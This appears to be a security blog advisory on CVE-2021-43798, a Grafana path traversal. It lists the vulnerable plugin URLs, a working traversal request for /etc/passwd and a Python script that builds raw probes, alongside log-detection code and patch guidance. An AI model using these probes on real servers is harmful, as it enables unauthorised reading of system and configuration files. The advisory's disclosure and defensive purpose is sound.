CVE-2021-43798 Grafana
January 30, 2023
On December 4, 2021, a security researcher publicly disclosed an arbitrary file read (path traversal) vulnerability in Grafana.
Unauthenticated attackers can use it to read sensitive files from the server's filesystem, including Grafana's own configuration file.
The vulnerability, CVE-2021-43798, carries a CVSS score of 7.5 (high).
Affected versions: Grafana 8.0.0-beta1 through 8.3.0
The vulnerable URL paths (one per plugin bundled with Grafana 8.x):
<grafana_host_url>/public/plugins/alertlist/
<grafana_host_url>/public/plugins/annolist/
<grafana_host_url>/public/plugins/barchart/
<grafana_host_url>/public/plugins/bargauge/
<grafana_host_url>/public/plugins/candlestick/
<grafana_host_url>/public/plugins/cloudwatch/
<grafana_host_url>/public/plugins/dashlist/
<grafana_host_url>/public/plugins/elasticsearch/
<grafana_host_url>/public/plugins/gauge/
<grafana_host_url>/public/plugins/geomap/
<grafana_host_url>/public/plugins/gettingstarted/
<grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
<grafana_host_url>/public/plugins/graph/
<grafana_host_url>/public/plugins/heatmap/
<grafana_host_url>/public/plugins/histogram/
<grafana_host_url>/public/plugins/influxdb/
<grafana_host_url>/public/plugins/jaeger/
<grafana_host_url>/public/plugins/logs/
<grafana_host_url>/public/plugins/loki/
<grafana_host_url>/public/plugins/mssql/
<grafana_host_url>/public/plugins/mysql/
<grafana_host_url>/public/plugins/news/
<grafana_host_url>/public/plugins/nodeGraph/
<grafana_host_url>/public/plugins/opentsdb/
<grafana_host_url>/public/plugins/piechart/
<grafana_host_url>/public/plugins/pluginlist/
<grafana_host_url>/public/plugins/postgres/
<grafana_host_url>/public/plugins/prometheus/
<grafana_host_url>/public/plugins/stackdriver/
<grafana_host_url>/public/plugins/stat/
<grafana_host_url>/public/plugins/state-timeline/
<grafana_host_url>/public/plugins/status-history/
<grafana_host_url>/public/plugins/table/
<grafana_host_url>/public/plugins/table-old/
<grafana_host_url>/public/plugins/tempo/
<grafana_host_url>/public/plugins/testdata/
<grafana_host_url>/public/plugins/text/
<grafana_host_url>/public/plugins/timeseries/
<grafana_host_url>/public/plugins/welcome/
<grafana_host_url>/public/plugins/zipkin/
How to exploit:
$HOST/public/plugins/graph/../../../../../../../../etc/passwd
Any of the plugin IDs above works in place of graph. The request must reach Grafana with the ../ segments intact: most HTTP clients and browsers collapse dot-segments before sending (curl needs --path-as-is), which silently turns the probe into a harmless request for /etc/passwd at the site root.
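The following script is an added example for this post, not code from the Grafana project or the original author. It builds the raw probe for each plugin (serialised by hand so no client normalises the path), recognises a served /etc/passwd in the response, and, for the defensive side, scans reverse-proxy access logs for traversal attempts under /public/plugins/, catching the %2e%2e-encoded form as well. The hostnames, log lines and response bodies are constructed for illustration.

```python
"""Probe builder, response check and access-log detection for CVE-2021-43798.

Added example for this post, not Grafana project code. Hostnames, log lines
and response bodies below are constructed for illustration.
"""
import re
from urllib.parse import unquote

# Plugin IDs bundled with Grafana 8.x whose /public/plugins/<id>/ route was vulnerable
PLUGIN_IDS = [
    "alertlist", "annolist", "barchart", "bargauge", "candlestick", "cloudwatch",
    "dashlist", "elasticsearch", "gauge", "geomap", "gettingstarted",
    "grafana-azure-monitor-datasource", "graph", "heatmap", "histogram",
    "influxdb", "jaeger", "logs", "loki", "mssql", "mysql", "news", "nodeGraph",
    "opentsdb", "piechart", "pluginlist", "postgres", "prometheus", "stackdriver",
    "stat", "state-timeline", "status-history", "table", "table-old", "tempo",
    "testdata", "text", "timeseries", "welcome", "zipkin",
]


def traversal_path(plugin: str, target: str = "/etc/passwd", depth: int = 8) -> str:
    """Raw request path for one plugin. Eight '../' segments is plenty: once the
    path reaches '/', further '..' segments are no-ops, so overshooting is safe."""
    return f"/public/plugins/{plugin}/" + "../" * depth + target.lstrip("/")


def raw_get_request(host: str, path: str) -> bytes:
    """Serialize a minimal HTTP/1.1 GET with the path exactly as given.
    Most HTTP clients collapse '../' before sending (curl needs --path-as-is);
    writing these bytes to a socket yourself avoids that normalisation."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def looks_like_passwd(body: str) -> bool:
    """True if the response body is a Unix passwd file (the usual proof of read)."""
    return re.search(r"^root:[^:]*:0:0:", body, re.MULTILINE) is not None


# Common/combined log format as written by a reverse proxy in front of Grafana
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A '..' segment under the plugin asset route; applied to the URL-decoded path so
# that %2e%2e and double-encoded variants are caught as well
TRAVERSAL_RE = re.compile(r"^/public/plugins/[^/]+/(?:.*/)?\.\.(?:/|$)")


def find_traversal_attempts(log_text: str) -> list[dict]:
    """One record per request that tries to traverse out of a plugin directory.
    Status is reported, not filtered on: a 200 means the file was served, a 404
    may be a patched server, but both are worth alerting on."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(unquote(m["path"]))  # two rounds cover double-encoding
        if TRAVERSAL_RE.search(decoded):
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": decoded,
                         "status": int(m["status"])})
    return hits


# Constructed sample: two probes from one client around a legitimate asset fetch
SAMPLE_LOG = """\
203.0.113.7 - - [04/Dec/2021:10:15:02 +0000] "GET /public/plugins/graph/../../../../../../../../etc/passwd HTTP/1.1" 200 1320
198.51.100.23 - - [04/Dec/2021:10:15:09 +0000] "GET /public/plugins/graph/module.js HTTP/1.1" 200 40210
203.0.113.7 - - [04/Dec/2021:10:16:41 +0000] "GET /public/plugins/prometheus/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 3127
"""

if __name__ == "__main__":
    # grafana.example.internal is a placeholder host, not a real target
    print(raw_get_request("grafana.example.internal", traversal_path("graph")).decode())
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```

The detection regex deliberately matches on the decoded path rather than on the literal `../`, and records the status code instead of requiring 200: on a patched instance the same probes come back 404, and a burst of them from one source is still the reconnaissance you want to see.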
Solutions and mitigations:
All installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible; the fix is in 8.3.1, 8.2.7, 8.1.8 and 8.0.7. Where the upgrade must wait, block requests at the reverse proxy whose path under /public/plugins/ contains a dot-segment (including the %2e%2e-encoded form), and review access logs for such requests, since the affected route needs no authentication.